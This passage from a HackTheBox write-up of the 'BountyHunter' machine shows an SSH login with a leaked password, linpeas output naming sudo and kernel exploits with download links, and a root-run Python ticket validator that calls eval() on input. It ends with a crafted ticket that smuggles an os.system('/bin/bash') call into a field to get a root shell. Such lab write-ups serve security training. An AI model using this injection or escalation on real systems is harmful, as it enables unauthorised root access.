I wasn’t sure what to do next — but I tried using the password for SSH as a last resort, and it worked! I obtained the user flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">ssh</span> development@<span class=\"token variable\">$RHOST</span>\n<span class=\"token comment\"># m19RoAU0hP41A1sTsq6K</span></code></pre></div>\n<p>Next, I’ll go for root.</p>\n<h2 id=\"privilege-escalation\" style=\"position:relative;\"><a href=\"#privilege-escalation\" aria-label=\"privilege escalation permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Privilege Escalation</h2>\n<p>From here, I perform privilege escalation.</p>\n<p>I ran linpeas to gather useful information.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\">#</span>\n Operative system\n https://book.hacktricks.xyz/linux-unix/privilege-escalation<span class=\"token comment\">#kernel-exploits</span>\nLinux version <span class=\"token number\">5.4</span>.0-80-generic <span class=\"token punctuation\">(</span>buildd@lcy01-amd64-030<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">(</span>gcc version <span class=\"token number\">9.3</span>.0 <span class=\"token punctuation\">(</span>Ubuntu <span class=\"token number\">9.3</span>.0-17ubuntu1~20.04<span class=\"token punctuation\">))</span> <span class=\"token comment\">#90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021</span>\nDistributor ID: Ubuntu\nDescription:    Ubuntu <span class=\"token number\">20.04</span>.2 LTS\nRelease:        <span class=\"token number\">20.04</span>\nCodename:       focal\n\n<span class=\"token comment\">#</span>\n Sudo version\n https://book.hacktricks.xyz/linux-unix/privilege-escalation<span class=\"token comment\">#sudo-version</span>\nSudo version <span class=\"token number\">1.8</span>.31\n\nPossible Exploits:\n<span class=\"token punctuation\">[</span>+<span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>CVE-2021-3156<span class=\"token punctuation\">]</span> <span class=\"token function\">sudo</span> Baron Samedit\n\n   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt\n   Exposure: probable\n   Tags: <span class=\"token assign-left variable\">mint</span><span class=\"token operator\">=</span><span class=\"token number\">19</span>,<span class=\"token punctuation\">[</span> <span class=\"token assign-left variable\">ubuntu</span><span class=\"token operator\">=</span><span class=\"token number\">18</span><span class=\"token operator\">|</span><span class=\"token number\">20</span> <span class=\"token punctuation\">]</span>, <span class=\"token assign-left variable\">debian</span><span class=\"token operator\">=</span><span class=\"token number\">10</span>\n   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main\n\n<span class=\"token punctuation\">[</span>+<span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>CVE-2021-3156<span class=\"token punctuation\">]</span> <span class=\"token function\">sudo</span> Baron Samedit <span class=\"token number\">2</span>\n\n   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt\n   Exposure: probable\n   Tags: <span class=\"token assign-left variable\">centos</span><span class=\"token operator\">=</span><span class=\"token number\">6</span><span class=\"token operator\">|</span><span class=\"token number\">7</span><span class=\"token operator\">|</span><span class=\"token number\">8</span>,<span class=\"token punctuation\">[</span> <span class=\"token assign-left variable\">ubuntu</span><span class=\"token operator\">=</span><span class=\"token number\">14</span><span class=\"token operator\">|</span><span class=\"token number\">16</span><span class=\"token operator\">|</span><span class=\"token number\">17</span><span class=\"token operator\">|</span><span class=\"token number\">18</span><span class=\"token operator\">|</span><span class=\"token number\">19</span><span class=\"token operator\">|</span><span class=\"token number\">20</span> <span class=\"token punctuation\">]</span>, <span class=\"token assign-left variable\">debian</span><span class=\"token operator\">=</span><span class=\"token number\">9</span><span class=\"token operator\">|</span><span class=\"token number\">10</span>\n   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main\n\n<span class=\"token punctuation\">[</span>+<span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>CVE-2021-22555<span class=\"token punctuation\">]</span> Netfilter heap out-of-bounds <span class=\"token function\">write</span>\n\n   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html\n   Exposure: probable\n   Tags: <span class=\"token punctuation\">[</span> <span class=\"token assign-left variable\">ubuntu</span><span class=\"token operator\">=</span><span class=\"token number\">20.04</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">{</span>kernel:5.8.0-*<span class=\"token punctuation\">}</span>\n   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c\n   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c\n   Comments: ip_tables kernel module must be loaded\n\n<span class=\"token punctuation\">[</span>+<span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>CVE-2017-5618<span class=\"token punctuation\">]</span> setuid <span class=\"token function\">screen</span> v4.5.0 LPE\n\n   Details: https://seclists.org/oss-sec/2017/q1/184\n   Exposure: <span class=\"token function\">less</span> probable\n   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154\n\n<span class=\"token function\">sudo</span> -l\nMatching Defaults entries <span class=\"token keyword\">for</span> development on bountyhunter:\n    env_reset, mail_badpass, <span class=\"token assign-left variable\">secure_path</span><span class=\"token operator\">=</span>/usr/local/sbin<span class=\"token punctuation\">\\</span>:/usr/local/bin<span class=\"token punctuation\">\\</span>:/usr/sbin<span class=\"token punctuation\">\\</span>:/usr/bin<span class=\"token punctuation\">\\</span>:/sbin<span class=\"token punctuation\">\\</span>:/bin<span class=\"token punctuation\">\\</span>:/snap/bin\n\nUser development may run the following commands on bountyhunter:\n    <span class=\"token punctuation\">(</span>root<span class=\"token punctuation\">)</span> NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py</code></pre></div>\n<p>There are several potential vulnerabilities, but I was interested in <code class=\"language-text\">ticketValidator.py</code>, which can be run with sudo without a password.</p>\n<h3 id=\"ticketvalidatorpy\" style=\"position:relative;\"><a href=\"#ticketvalidatorpy\" aria-label=\"ticketvalidatorpy permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>ticketValidator.py</h3>\n<p>Here is the script:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\">#Skytrain Inc Ticket Validation System 0.1</span>\n<span class=\"token comment\">#Do not distribute this file.</span>\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">load_file</span><span class=\"token punctuation\">(</span>loc<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">if</span> loc<span class=\"token punctuation\">.</span>endswith<span class=\"token punctuation\">(</span><span class=\"token string\">\".md\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span>loc<span class=\"token punctuation\">,</span> <span class=\"token string\">'r'</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Wrong file type.\"</span><span class=\"token punctuation\">)</span>\n        exit<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">evaluate</span><span class=\"token punctuation\">(</span>ticketFile<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token comment\">#Evaluates a ticket to check for ireggularities.</span>\n    code_line <span class=\"token operator\">=</span> <span class=\"token boolean\">None</span>\n    <span class=\"token keyword\">for</span> i<span class=\"token punctuation\">,</span>x <span class=\"token keyword\">in</span> <span class=\"token builtin\">enumerate</span><span class=\"token punctuation\">(</span>ticketFile<span class=\"token punctuation\">.</span>readlines<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">if</span> i <span class=\"token operator\">==</span> <span class=\"token number\">0</span><span class=\"token punctuation\">:</span>\n            <span class=\"token keyword\">if</span> <span class=\"token keyword\">not</span> x<span class=\"token punctuation\">.</span>startswith<span class=\"token punctuation\">(</span><span class=\"token string\">\"# Skytrain Inc\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n                <span class=\"token keyword\">return</span> <span class=\"token boolean\">False</span>\n            <span class=\"token keyword\">continue</span>\n        <span class=\"token keyword\">if</span> i <span class=\"token operator\">==</span> <span class=\"token number\">1</span><span class=\"token punctuation\">:</span>\n            <span class=\"token keyword\">if</span> <span class=\"token keyword\">not</span> x<span class=\"token punctuation\">.</span>startswith<span class=\"token punctuation\">(</span><span class=\"token string\">\"## Ticket to \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n                <span class=\"token keyword\">return</span> <span class=\"token boolean\">False</span>\n            <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"Destination: </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span><span class=\"token string\">' '</span><span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span>x<span class=\"token punctuation\">.</span>strip<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">' '</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">3</span><span class=\"token punctuation\">:</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">continue</span>\n\n        <span class=\"token keyword\">if</span> x<span class=\"token punctuation\">.</span>startswith<span class=\"token punctuation\">(</span><span class=\"token string\">\"__Ticket Code:__\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n            code_line <span class=\"token operator\">=</span> i<span class=\"token operator\">+</span><span class=\"token number\">1</span>\n            <span class=\"token keyword\">continue</span>\n\n        <span class=\"token keyword\">if</span> code_line <span class=\"token keyword\">and</span> i <span class=\"token operator\">==</span> code_line<span class=\"token punctuation\">:</span>\n            <span class=\"token keyword\">if</span> <span class=\"token keyword\">not</span> x<span class=\"token punctuation\">.</span>startswith<span class=\"token punctuation\">(</span><span class=\"token string\">\"**\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n                <span class=\"token keyword\">return</span> <span class=\"token boolean\">False</span>\n            ticketCode <span class=\"token operator\">=</span> x<span class=\"token punctuation\">.</span>replace<span class=\"token punctuation\">(</span><span class=\"token string\">\"**\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\"+\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span>\n            <span class=\"token keyword\">if</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>ticketCode<span class=\"token punctuation\">)</span> <span class=\"token operator\">%</span> <span class=\"token number\">7</span> <span class=\"token operator\">==</span> <span class=\"token number\">4</span><span class=\"token punctuation\">:</span>\n                validationNumber <span class=\"token operator\">=</span> <span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>x<span class=\"token punctuation\">.</span>replace<span class=\"token punctuation\">(</span><span class=\"token string\">\"**\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n                <span class=\"token keyword\">if</span> validationNumber <span class=\"token operator\">></span> <span class=\"token number\">100</span><span class=\"token punctuation\">:</span>\n                    <span class=\"token keyword\">return</span> <span class=\"token boolean\">True</span>\n                <span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n                    <span class=\"token keyword\">return</span> <span class=\"token boolean\">False</span>\n    <span class=\"token keyword\">return</span> <span class=\"token boolean\">False</span>\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    fileName <span class=\"token operator\">=</span> <span class=\"token builtin\">input</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Please enter the path to the ticket file.\\n\"</span><span class=\"token punctuation\">)</span>\n    ticket <span class=\"token operator\">=</span> load_file<span class=\"token punctuation\">(</span>fileName<span class=\"token punctuation\">)</span>\n    <span class=\"token comment\">#DEBUG print(ticket)</span>\n    result <span class=\"token operator\">=</span> evaluate<span class=\"token punctuation\">(</span>ticket<span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>result<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Valid ticket.\"</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Invalid ticket.\"</span><span class=\"token punctuation\">)</span>\n    ticket<span class=\"token punctuation\">.</span>close\n\nmain<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>This appears to be a script that accepts a file in a specific format as input and parses it.</p>\n<p>Exploring the system, I found the ticket format:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\">#cat /opt/skytrain_inc/invalid_tickets/390681613.md</span>\n\n<span class=\"token comment\"># Skytrain Inc</span>\n<span class=\"token comment\">## Ticket to New Haven</span>\n__Ticket Code:__\n**31+410+86**\n<span class=\"token comment\">##Issued: 2021/04/06</span>\n<span class=\"token comment\">#End Ticket</span></code></pre></div>\n<p>Here, <code class=\"language-text\">eval</code> is called when the first number (split by <code class=\"language-text\">+</code>) on the line after <code class=\"language-text\">__Ticket Code:__</code> has a mod-7 result equal to 4.</p>\n<p>This means the part <code class=\"language-text\">**31+410+86**</code> becomes the argument to <code class=\"language-text\">eval</code>, so I can embed a command to spawn a shell inside it.</p>\n<p>For a reference on calling a shell from <code class=\"language-text\">eval</code>, this Stack Overflow post was helpful:</p>\n<p>Reference: <a href=\"https://stackoverflow.com/questions/59519289/python-running-reverse-shell-inside-eval\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Python - running reverse shell inside eval() - Stack Overflow</a></p>\n<p>So I created the following file:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\">#cat mal.md</span>\n\n<span class=\"token comment\"># Skytrain Inc</span>\n<span class=\"token comment\">## Ticket to New Haven</span>\n__Ticket Code:__\n**11+100 <span class=\"token operator\">!=</span> <span class=\"token number\">0</span> and __import__<span class=\"token punctuation\">(</span><span class=\"token string\">'os'</span><span class=\"token punctuation\">)</span>.system<span class=\"token punctuation\">(</span><span class=\"token string\">'/bin/bash'</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> False**\n<span class=\"token comment\">##Issued: 2021/04/06</span>\n<span class=\"token comment\">#End Ticket</span></code></pre></div>\n<p>Running <code class=\"language-text\">ticketValidator.py</code> with sudo and passing this file spawns a root shell.</p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>True to the machine name, the process of finding bugs yourself to obtain root was quite enjoyable.</p>","fields":{"slug":"/hackthebox-linux-bugbountyhunter-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2021-11-25","description":"A writeup of the retired HackTheBox machine 'BountyHunter'.","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: BountyHunter (Easy/Linux)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-linux-bugbountyhunter-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}